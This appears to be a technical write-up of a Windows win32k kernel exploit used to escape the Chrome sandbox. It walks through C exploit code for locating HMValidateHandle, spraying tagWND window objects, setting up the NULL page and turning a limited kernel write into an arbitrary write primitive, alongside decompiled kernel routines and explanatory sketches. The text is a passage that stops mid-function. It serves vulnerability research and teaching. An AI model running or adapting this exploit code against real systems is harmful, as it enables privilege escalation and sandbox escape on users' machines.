BOOL findHMValidateHandleAddress(HMODULE hUser32) {
	// The address of the function HMValidateHandle() is not exported to
	// the public. However the function IsMenu() contains a call to HMValidateHandle()
	// within it after some short setup code. The call starts with the byte \xE8.

	// Obtain the address of the function IsMenu() from user32.dll.
	BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu");
	if (pIsMenuFunction == NULL) {
		printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n");
		return FALSE;
	}
	else {
		printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction);
	}

	// Search for the location of the \xE8 byte within the IsMenu() function
	// to find the start of the relative call to HMValidateHandle().
	unsigned int offsetInIsMenuFunction = 0;
	BOOL foundHMValidateHandleAddress = FALSE;
	for (unsigned int i = 0; i < 0x1000; i++) {
		BYTE* pCurrentByte = pIsMenuFunction + i;
		if (*pCurrentByte == 0xE8) {
			offsetInIsMenuFunction = i + 1;
			break;
		}
	}

	// Throw error and exit if the \xE8 byte couldn't be located.
	if (offsetInIsMenuFunction == 0) {
		printf("[!] Couldn't find offset to HMValidateHandle within IsMenu.\r\n");
		return FALSE;
	}

	// Output address of user32.dll in memory for debugging purposes.
	printf("[*] hUser32: 0x%08X\r\n", hUser32);

	// Get the value of the relative address being called within the IsMenu() function.
	unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction);
	printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu);

	// Find out how far the IsMenu() function is located from the base address of user32.dll.
	unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32);
	printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32);

	// Take this offset and add to it the relative address used in the call to HMValidateHandle().
	// Result should be the offset of HMValidateHandle() from the start of user32.dll.
	unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu;
	printf("[*] offset: 0x%08X\r\n", offset);

	// Skip over 11 bytes since on Windows 10 these are not NOPs and it would be
	// ideal if this code could be reused in the future.
	pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11);
	printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle);
	return TRUE;
}
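
For reference, the generic way to resolve the target of an x86 near call (opcode 0xE8 followed by a 32-bit displacement) is to add the displacement to the address of the next instruction. The sketch below applies that rule to a byte buffer. It is not the routine used by the exploit, which applies its own fixed adjustment, and find_first_call_target and code_va are hypothetical names. Like the exploit's scan, it assumes that the first 0xE8 byte really is a call opcode and not part of another instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Scan code[0..len) for the first 0xE8 byte and resolve the call target.
   code_va is the (hypothetical) virtual address of code[0].
   Returns 1 and stores the target on success, 0 if no call was found. */
static int find_first_call_target(const uint8_t *code, size_t len,
                                  uint32_t code_va, uint32_t *target) {
    assert(code != NULL && target != NULL);
    for (size_t i = 0; i + 5 <= len; i++) {
        if (code[i] == 0xE8) {
            /* Assemble the little-endian 32-bit displacement. */
            uint32_t rel32 = (uint32_t)code[i + 1]
                           | ((uint32_t)code[i + 2] << 8)
                           | ((uint32_t)code[i + 3] << 16)
                           | ((uint32_t)code[i + 4] << 24);
            /* Target = address of the next instruction + displacement,
               computed modulo 2^32 so negative displacements work. */
            *target = code_va + (uint32_t)i + 5u + rel32;
            return 1;
        }
    }
    return 0;
}
```

A backwards call simply has a displacement with the top bit set; the unsigned wrap-around in the addition handles it without a separate signed path.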

Creating an Arbitrary Kernel Address Write Primitive with Window Objects

Once the address of HMValidateHandle() has been obtained, the exploit will call the sprayWindows() function. The first thing that sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). The sprayWindowClass will also be set up such that any windows created with this class will use the attacker defined window procedure sprayCallback().

A HWND table named hwndSprayHandleTable will then be created, and a loop will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass and save their handles into hwndSprayHandleTable. Once this spray is complete, two loops, one nested inside the other, are used to obtain a userland copy of each of the tagWND objects using HMValidateHandle().

The kernel address of each of these tagWND objects is then obtained by examining the object’s pSelf field. The kernel addresses are compared with one another until two tagWND objects are found that are less than 0x3FD00 bytes apart in kernel memory, at which point the loops are terminated.

/* The following definitions define the various structures
   needed within sprayWindows() */
typedef struct _HEAD
{
	HANDLE h;
	DWORD  cLockObj;
} HEAD, *PHEAD;

typedef struct _THROBJHEAD
{
	HEAD h;
	PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;

typedef struct _THRDESKHEAD
{
	THROBJHEAD h;
	PVOID    rpdesk;
	PVOID    pSelf;   // points to the kernel mode address of the object
} THRDESKHEAD, *PTHRDESKHEAD;
....
// Spray the windows and find two that are less than 0x3fd00 apart in memory.
if (sprayWindows() == FALSE) {
	printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
	ExitProcess(-1);
}
....
// Define the HMValidateHandle window type TYPE_WINDOW appropriately.
#define TYPE_WINDOW 1

/* Main function for spraying the tagWND objects into memory and finding two
   that are less than 0x3fd00 apart */
bool sprayWindows() {
	HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray.

	// Create and set up the window class for the sprayed window objects.
	WNDCLASSEXW sprayClass = { 0 };
	sprayClass.cbSize = sizeof(WNDCLASSEXW);
	sprayClass.lpszClassName = TEXT("sprayWindowClass");
	sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed 
                                          // window objects to sprayCallback().

	if (RegisterClassExW(&sprayClass) == 0) {
		printf("[!] Couldn't register the sprayClass class!\r\n");
		return FALSE; // Without the class, none of the windows below can be created.
	}

	// Create 0x100 windows using the sprayClass window class with the window name "spray".
	for (int i = 0; i < 0x100; i++) {
		hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
	}

	// For each entry in the hwndSprayHandle table...
	for (int x = 0; x < 0x100; x++) {
		// Leak the kernel address of the current HWND being examined, save it into firstEntryAddress.
		THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW);
		unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf;

		// Then start a loop to start comparing the kernel address of this hWND
		// object to the kernel address of every other hWND object...
		for (int y = 0; y < 0x100; y++) {
			if (x != y) { // Skip over one instance of the loop if the entries being compared are
                    // at the same offset in the hwndSprayHandleTable

				// Leak the kernel address of the second hWND object being used in 
        // the comparison, save it into secondEntryAddress.
				THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW);
				unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf;

				// If the kernel address of the hWND object leaked earlier in the code is greater than
				// the kernel address of the hWND object leaked above, execute the following code.
				if (firstEntryAddress > secondEntryAddress) {

					// Check if the difference between the two addresses is less than 0x3fd00.
					if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) {
						printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress);
						printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress);

						// Save the handle of secondEntryAddress into hPrimaryWindow 
            // and its address into primaryWindowAddress.
						hPrimaryWindow = hwndSprayHandleTable[y];
						primaryWindowAddress = secondEntryAddress;

						// Save the handle of firstEntryAddress into hSecondaryWindow 
            // and its address into secondaryWindowAddress.
						hSecondaryWindow = hwndSprayHandleTable[x];
						secondaryWindowAddress = firstEntryAddress;

						// Windows have been found, escape the loop.
						break;
					}
				}

				// If the kernel address of the hWND object leaked earlier in the code is less than
				// the kernel address of the hWND object leaked above, execute the following code.
				else {

					// Check if the difference between the two addresses is less than 0x3fd00.
					if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) {
						printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress);
						printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress);

						// Save the handle of firstEntryAddress into hPrimaryWindow 
            // and its address into primaryWindowAddress.
						hPrimaryWindow = hwndSprayHandleTable[x];
						primaryWindowAddress = firstEntryAddress;

						// Save the handle of secondEntryAddress into hSecondaryWindow 
            // and its address into secondaryWindowAddress.
						hSecondaryWindow = hwndSprayHandleTable[y];
						secondaryWindowAddress = secondEntryAddress;

						// Windows have been found, escape the loop.
						break;
					}
				}
			}
		}

		// Check if the inner loop ended and the windows were found. If so print a debug message.
		// Otherwise continue on to the next object in the hwndSprayTable array.
		if (hPrimaryWindow != NULL) {
			printf("[*] Found target windows!\r\n");
			break;
		}
	}

Once two tagWND objects matching these requirements are found, their addresses will be compared to see which one is located earlier in memory. The tagWND object located earlier in memory will become the primary window; its address will be saved into the global variable primaryWindowAddress, whilst its handle will be saved into the global variable hPrimaryWindow. The other tagWND object will become the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow.
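
The search logic can be condensed into a small, platform-independent function. This is a sketch over an array of already-leaked addresses, not over live window handles; find_close_pair and its parameters are hypothetical names introduced for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_DISTANCE 0x3fd00u /* distance limit used by the exploit */

/* Find the first pair of addresses that are less than MAX_DISTANCE apart.
   On success, *primary receives the index of the lower address and
   *secondary the index of the higher one. Returns 1 if found, 0 otherwise. */
static int find_close_pair(const uint32_t *addrs, size_t count,
                           size_t *primary, size_t *secondary) {
    assert(addrs != NULL && primary != NULL && secondary != NULL);
    for (size_t x = 0; x < count; x++) {
        for (size_t y = 0; y < count; y++) {
            if (x == y) continue; /* never compare a window with itself */
            int x_is_lower = addrs[x] < addrs[y];
            uint32_t lo = x_is_lower ? addrs[x] : addrs[y];
            uint32_t hi = x_is_lower ? addrs[y] : addrs[x];
            if (hi - lo < MAX_DISTANCE) {
                *primary   = x_is_lower ? x : y;
                *secondary = x_is_lower ? y : x;
                return 1;
            }
        }
    }
    return 0;
}
```

Returning from inside the nested loops avoids the separate "was a pair found" check that the original code needs after its inner break.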

Once the addresses of these windows have been saved, the other windows within hwndSprayHandleTable are destroyed using DestroyWindow() in order to release resources back to the host operating system.

// Check that hPrimaryWindow isn't NULL after both the loops are
// complete. This will only occur in the event that none of the 0x100
// window objects were within 0x3fd00 bytes of each other. If this occurs, then bail.
if (hPrimaryWindow == NULL) {
	printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n");
	return FALSE;
}

// This loop will destroy the handles to all other
// windows besides hPrimaryWindow and hSecondaryWindow,
// thereby ensuring that there are no lingering unused
// handles wasting system resources.
for (int p = 0; p < 0x100; p++) {
	HWND temp = hwndSprayHandleTable[p];
	if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) {
		DestroyWindow(temp);
	}
}

addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to
                                                    // primaryWindow's cbwndExtra field.

printf("[*] Destroyed spare windows!\r\n");

// Check if it's possible to set the window text in hSecondaryWindow.
// If this isn't possible, there is a serious error, and the program should exit.
// Otherwise return TRUE as everything has been set up correctly.
if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) {
	printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n");
	return FALSE;
}
else {
	return TRUE;
}

The final part of sprayWindows() sets addressToWrite to the address of the cbwndExtra field within primaryWindowAddress in order to let the exploit know where the limited write primitive should write the value 0x40000000 to.

To understand why tagWND objects were sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well known kernel write primitive that exists on Windows versions prior to Windows 10 RS1.

As is explained in Saif Sheri and Ian Kronquist’s The Life & Death of Kernel Object Abuse paper and Morten Schenk’s Taking Windows 10 Kernel Exploitation to The Next Level presentation, if one can place two tagWND objects together in memory one after another and then edit the cbwndExtra field of the tagWND object located earlier in memory via a kernel write vulnerability, they can extend the expected length of the former tagWND’s WndExtra data field such that it thinks it controls memory that is actually controlled by the second tagWND object.

The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it.

Effects of adjusting the cbwndExtra field in hPrimaryWindow

Once the cbwndExtra field of the first tagWND object has been overwritten, an attacker who calls SetWindowLong() on the first tagWND object can overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is then called on the second tagWND object, the address contained in the overwritten strName.Buffer field will be used as the destination address for the write operation.

By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The following listing from WinDBG shows the fields of the tagWND object which are relevant to this technique.

1: kd> dt -r1 win32k!tagWND
   +0x000 head             : _THRDESKHEAD
      +0x000 h                : Ptr32 Void
      +0x004 cLockObj         : Uint4B
      +0x008 pti              : Ptr32 tagTHREADINFO
      +0x00c rpdesk           : Ptr32 tagDESKTOP
      +0x010 pSelf            : Ptr32 UChar
   ...
   +0x084 strName          : _LARGE_UNICODE_STRING
      +0x000 Length           : Uint4B
      +0x004 MaximumLength    : Pos 0, 31 Bits
      +0x004 bAnsi            : Pos 31, 1 Bit
      +0x008 Buffer           : Ptr32 Uint2B
   +0x090 cbwndExtra       : Int4B
   ...      
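
The idea can be illustrated with a deliberately simplified model in which both windows live in one flat byte array. The field offsets are taken from the listing above and from the exploit code; the bounds check is an assumption about how SetWindowLong() validates its index and is far simpler than the real implementation. model_set_window_long and the pool layout are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
    OFF_STRNAME_BUFFER = 0x8C, /* strName.Buffer, from the listing above */
    OFF_CBWNDEXTRA     = 0x90, /* cbwndExtra, from the listing above */
    OFF_EXTRA_BYTES    = 0xB0  /* start of the extra bytes, per the exploit code */
};

/* Simplified stand-in for SetWindowLong(): writes value at
   wnd_off + OFF_EXTRA_BYTES + index, but only if the index passes a bounds
   check against the window's cbwndExtra field. Returns 1 on success. */
static int model_set_window_long(uint8_t *pool, size_t pool_len, size_t wnd_off,
                                 uint32_t index, uint32_t value) {
    uint32_t cb_extra;
    assert(wnd_off + OFF_EXTRA_BYTES <= pool_len);
    memcpy(&cb_extra, pool + wnd_off + OFF_CBWNDEXTRA, sizeof cb_extra);
    if (cb_extra < sizeof value || index > cb_extra - sizeof value)
        return 0; /* rejected: index lies outside the extra bytes */
    size_t dst = wnd_off + OFF_EXTRA_BYTES + index;
    assert(dst + sizeof value <= pool_len); /* keep the model memory-safe */
    memcpy(pool + dst, &value, sizeof value);
    return 1;
}
```

With an honest cbwndExtra the out-of-range index is refused. Once the 0x40000000 bit has been ORed into the field, the same call succeeds and lands inside the neighbouring window.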

Leaking the Address of pPopupMenu for Write Address Calculations

Before continuing, let’s reexamine how MNGetpItemFromIndex(), which returns the address to be written to, minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.
   result = 0;
else
   result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}

Notice that on line 8 there are two components which make up the final address which is returned. These are pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which will be read from offset 0x34 in the NULL page. Without the ability to determine the values of both of these items, the attacker will not be able to fully control what address is returned by MNGetpItemFromIndex(), and therefore which address xxxMNSetGapState() writes to in memory.

There is a solution to this, however, which can be observed by viewing the updates made to the code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This is then used to compute the variable addressToWriteTo, which becomes the value of spMenu->rgItems read by MNGetpItemFromIndex(), so that it returns the correct address for xxxMNSetGapState() to write to.

LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
	if (msg == WM_MN_FINDMENUWINDOWFROMPOINT){
		printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n");
		printf("[*] Restoring window procedure...\r\n");
		SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);

		/* The wParam parameter here has the same value as pPopupMenu inside MNGetpItemFromIndex,
		   except that wParam is 0x10 lower. The code below adds 0x10 to compensate.

		   This is an important information leak as without this the attacker
		   cannot manipulate the values returned from MNGetpItemFromIndex, which
		   can result in kernel crashes and a dramatic decrease in exploit reliability.
		*/
		UINT pPopupAddressInCalculations = wParam + 0x10;

		// Set the address to write to to be the right bit of cbwndExtra in the target tagWND.
		UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4));

To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application’s main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter’s value into a local variable for later use.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
    v6 = xxxSendMessage(
           var_pPopupMenu->spwndNextPopup,
           MN_FINDMENUWINDOWFROMPOINT,
           (WPARAM)&pPopupMenu,
           (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the 
                                      // MN_FINDMENUWINDOWFROMPOINT usermode callback
                                      // using the address of pPopupMenu as the 
                                      // wParam argument.
    ThreadUnlock1();
    if ( IsMFMWFPWindow(v6) )  // Validate the handle returned from the user
                               // mode callback is a handle to a MFMWFP window.
      v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned 
                                                                        // handle is a handle to 
                                                                        // a window object. Set v1 to
                                                                        // TRUE if all is good.
      ...

During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the wParam value received from xxxSendMessage() to ensure that the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex().
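
As a sanity check on the formula for addressToWriteTo, the following sketch recomputes it with 32-bit wrap-around arithmetic and confirms where the two writes land. The function names compute_rg_items, item_from_index and second_write_target are hypothetical; they only mirror the arithmetic shown in SubMenuProc(), MNGetpItemFromIndex() and xxxMNSetGapState().

```c
#include <assert.h>
#include <stdint.h>

#define ITEM_SIZE 0x6Cu /* multiplier used by MNGetpItemFromIndex() */

/* Mirror of the exploit's calculation: choose rgItems so that the second
   write in xxxMNSetGapState() hits address_to_write. wparam is the value
   received in the callback, which is 0x10 lower than the index used later. */
static uint32_t compute_rg_items(uint32_t address_to_write, uint32_t wparam) {
    uint32_t index = wparam + 0x10u;
    return (address_to_write + ITEM_SIZE) - ((index * ITEM_SIZE) + 0x4u);
}

/* Mirror of the address arithmetic in MNGetpItemFromIndex() (no bounds check). */
static uint32_t item_from_index(uint32_t rg_items, uint32_t index) {
    return rg_items + ITEM_SIZE * index;
}

/* Address hit by the 0x40000000 write: the item for (index - 1), plus 4. */
static uint32_t second_write_target(uint32_t rg_items, uint32_t index) {
    /* An index of 0 would make index - 1 equal to -1, which
       MNGetpItemFromIndex() rejects. */
    assert(index != 0u);
    return item_from_index(rg_items, index - 1u) + 4u;
}
```

For any wParam value, the terms involving the index cancel modulo 2^32, so the 0x40000000 write lands exactly on the chosen address and the 0x80000000 write lands 0x6C bytes after it.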

Setting up the Memory in the NULL Page

Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately the following offsets need to be filled out:

  • 0x20
  • 0x34
  • 0x4C
  • 0x50 to 0x1050

This can be seen in more detail in the following diagram.

NULL page utilization

The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done as spMenu will be NULL at this point, so spMenu->cItems will contain the value at offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer will ensure that spMenu->cItems is greater than the value of pPopupMenu, which will prevent MNGetpItemFromIndex() from returning 0 instead of result. This can be seen on line 5 of the following code.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur 
                                                        // here if spMenu is NULL.
    result = 0;
else
    result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}

Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation shown on line 8 will set result to the address of primaryWindow‘s cbwndExtra field, minus an offset of 0x4.
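
The role of offsets 0x20 and 0x34 can be modelled with an ordinary buffer standing in for the NULL page. This is a sketch of the decompiled logic only; field_u32 and model_get_item are hypothetical names, and the buffer is not real kernel-visible memory.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    OFF_CITEMS  = 0x20, /* spMenu->cItems */
    OFF_RGITEMS = 0x34  /* spMenu->rgItems */
};

/* Read a 32-bit field from the buffer that stands in for the NULL page. */
static uint32_t field_u32(const uint8_t *page, uint32_t off) {
    uint32_t v;
    memcpy(&v, page + off, sizeof v);
    return v;
}

/* Model of MNGetpItemFromIndex() with spMenu pointing at `page`.
   Returns 0 when the index is rejected, as the decompiled code does. */
static uint32_t model_get_item(const uint8_t *page, uint32_t index) {
    assert(page != NULL);
    if (index == 0xFFFFFFFFu || index >= field_u32(page, OFF_CITEMS))
        return 0;
    return field_u32(page, OFF_RGITEMS) + 0x6Cu * index;
}
```

If the DWORD at offset 0x20 is left at zero, every index is rejected; setting it to 0xFFFFFFFF lets every index except -1 through.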

The other offsets require a more detailed explanation. The following disassembly shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets.

.text:BF975EA3                 mov     eax, [ebx+14h]  ; EAX = ppopupmenu->spmenu
.text:BF975EA3                                         ;
.text:BF975EA3                                         ; Should set EAX to 0 or NULL.
.text:BF975EA6                 push    dword ptr [eax+4Ch] ; uIndex aka pPopupMenu. This will be the 
.text:BF975EA6                                             ; value at address 0x4C given that
.text:BF975EA6                                             ; ppopupmenu->spmenu is NULL.
.text:BF975EA9                 push    eax             ; spMenu. Will be NULL or 0.
.text:BF975EAA                 call    MNGetpItemFromIndex
..............
.text:BF975EBA                 add     ecx, [eax+28h]  ; ECX += pItemFromIndex->yItem
.text:BF975EBA                                         ;
.text:BF975EBA                                         ; pItemFromIndex->yItem will be the value
.text:BF975EBA                                         ; at offset 0x28 of whatever value
.text:BF975EBA                                         ; MNGetpItemFromIndex returns.
...............
.text:BF975ECE                 cmp     ecx, ebx
.text:BF975ED0                 jg      short loc_BF975EDB ; Jump to loc_BF975EDB if the following 
.text:BF975ED0                                            ; condition is true:
.text:BF975ED0                                            ;
.text:BF975ED0                                            ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))

As can be seen above, a call will be made to MNGetpItemFromIndex() using two parameters: spMenu which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() will then be incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address will then be used to set pItemFromIndex->yItem, which will be utilized in a calculation to determine whether a jump should be taken. The exploit needs to ensure that this jump is always taken as it ensures that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner.

To ensure this jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180. By then setting the bytes at offsets 0x50 to 0x1050 within the NULL page to 0xF0, the attacker can ensure that regardless of the value that MNGetpItemFromIndex() returns, when it is incremented by 0x28 and used as a pointer to a DWORD it will result in pItemFromIndex->yItem being set to 0xF0F0F0F0. This will cause the first half of the following calculation to always be a very large unsigned integer, and therefore the jump will always be taken.

((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))
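
Why the fill makes the value of yItem independent of the exact pointer can be checked with a small model. The buffer below stands in for the NULL page, and fill_fake_page and read_y_item are hypothetical helper names; the sketch only demonstrates the read, not the comparison that follows it.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    FILL_START = 0x50,   /* first filled offset */
    FILL_LEN   = 0x1000  /* number of filled bytes */
};

/* Fill a buffer standing in for the NULL page the same way the exploit does. */
static void fill_fake_page(uint8_t *page, size_t page_len) {
    assert(page_len >= (size_t)FILL_START + (size_t)FILL_LEN);
    memset(page + FILL_START, 0xF0, FILL_LEN);
}

/* Model of reading pItemFromIndex->yItem: a DWORD at item_off + 0x28. */
static uint32_t read_y_item(const uint8_t *page, uint32_t item_off) {
    uint32_t v;
    memcpy(&v, page + item_off + 0x28u, sizeof v);
    return v;
}
```

Every item offset between 0x120 and 0x180 reads its DWORD from well inside the filled range, so alignment and the exact return value no longer matter.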

Forming a Stronger Write Primitive by Using the Limited Write Primitive

Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue.

memset((void *)0x50, 0xF0, 0x1000);

return (ULONG)hWndFakeMenu;

After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below.

v6 = xxxSendMessage(
       var_pPopupMenu->spwndNextPopup,
       MN_FINDMENUWINDOWFROMPOINT,
       (WPARAM)&pPopupMenu,
       (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the 
                                      // MN_FINDMENUWINDOWFROMPOINT usermode callback
                                      // using the address of pPopupMenu as the 
                                      // wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
                          // mode callback is a handle to a MFMWFP window.
  v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned handle 
                                                                    // is a handle to a window object. 
                                                                    // Set v1 to TRUE if all is good.

If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below. This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow‘s WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow.

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
  ...
          var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write 
                                                         // operation should occur, minus an 
                                                         // offset of 0x4.
          temp_var_PITEM = var_PITEM;
          if ( var_PITEM )
          {
            ...
            var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the 
                                                         // address where the second write operation 
                                                         // should occur, minus an offset of 0x4. This 
                                                         // address will be 0x6C bytes earlier in 
                                                         // memory than the address in var_PITEM.
            if ( fSet )
            {
              *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the 
                                                             // attacker controlled address.
              if ( var_PITEM_Minus_Offset_Of_0x6C )
              {
                *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u; 
                                                    // Conduct the second write to the attacker
                                                    // controlled address minus 0x68 (0x6C-0x4).

Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code.

else {
	if ((cwp->message == 0x1E5)) {
		UINT offset = 0; // Create the offset variable which will hold the offset from the
					           // start of hPrimaryWindow's cbwnd data field to write to.

		UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set 
                                 // addressOfStartofPrimaryWndCbWndData to the address of
                                 // the start of hPrimaryWindow's cbwnd data field.

		// Set offset to the difference between hSecondaryWindow's
		// strName.Buffer's memory address and the address of
		// hPrimaryWindow's cbwnd data field.
		offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
		printf("[*] Offset: 0x%08X\r\n", offset);

		// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16),
    // or the address of the bServerSideWindowProc bit.
		if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
			printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
			ExitProcess(-1);
		}
		else {
			printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
		}

This code will start by checking if the window message was 0x1E5. If it was then the code will calculate the distance between the start of primaryWindow‘s wndExtra data section and the location of secondaryWindow‘s strName.Buffer pointer. The difference between these two locations will be saved into the variable offset.
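
The offset calculation can be written as a standalone function and checked with sample values. The addresses in the usage note are arbitrary placeholders, not values observed on a real system, and strname_buffer_index is a hypothetical name.

```c
#include <assert.h>
#include <stdint.h>

enum {
    OFF_STRNAME_BUFFER = 0x8C, /* strName.Buffer within tagWND */
    OFF_EXTRA_BYTES    = 0xB0  /* start of the extra bytes, per the exploit code */
};

/* Index to pass to SetWindowLong() on the primary window so that the write
   lands on the secondary window's strName.Buffer field. */
static uint32_t strname_buffer_index(uint32_t primary_wnd, uint32_t secondary_wnd) {
    assert(secondary_wnd > primary_wnd); /* primary is the lower address */
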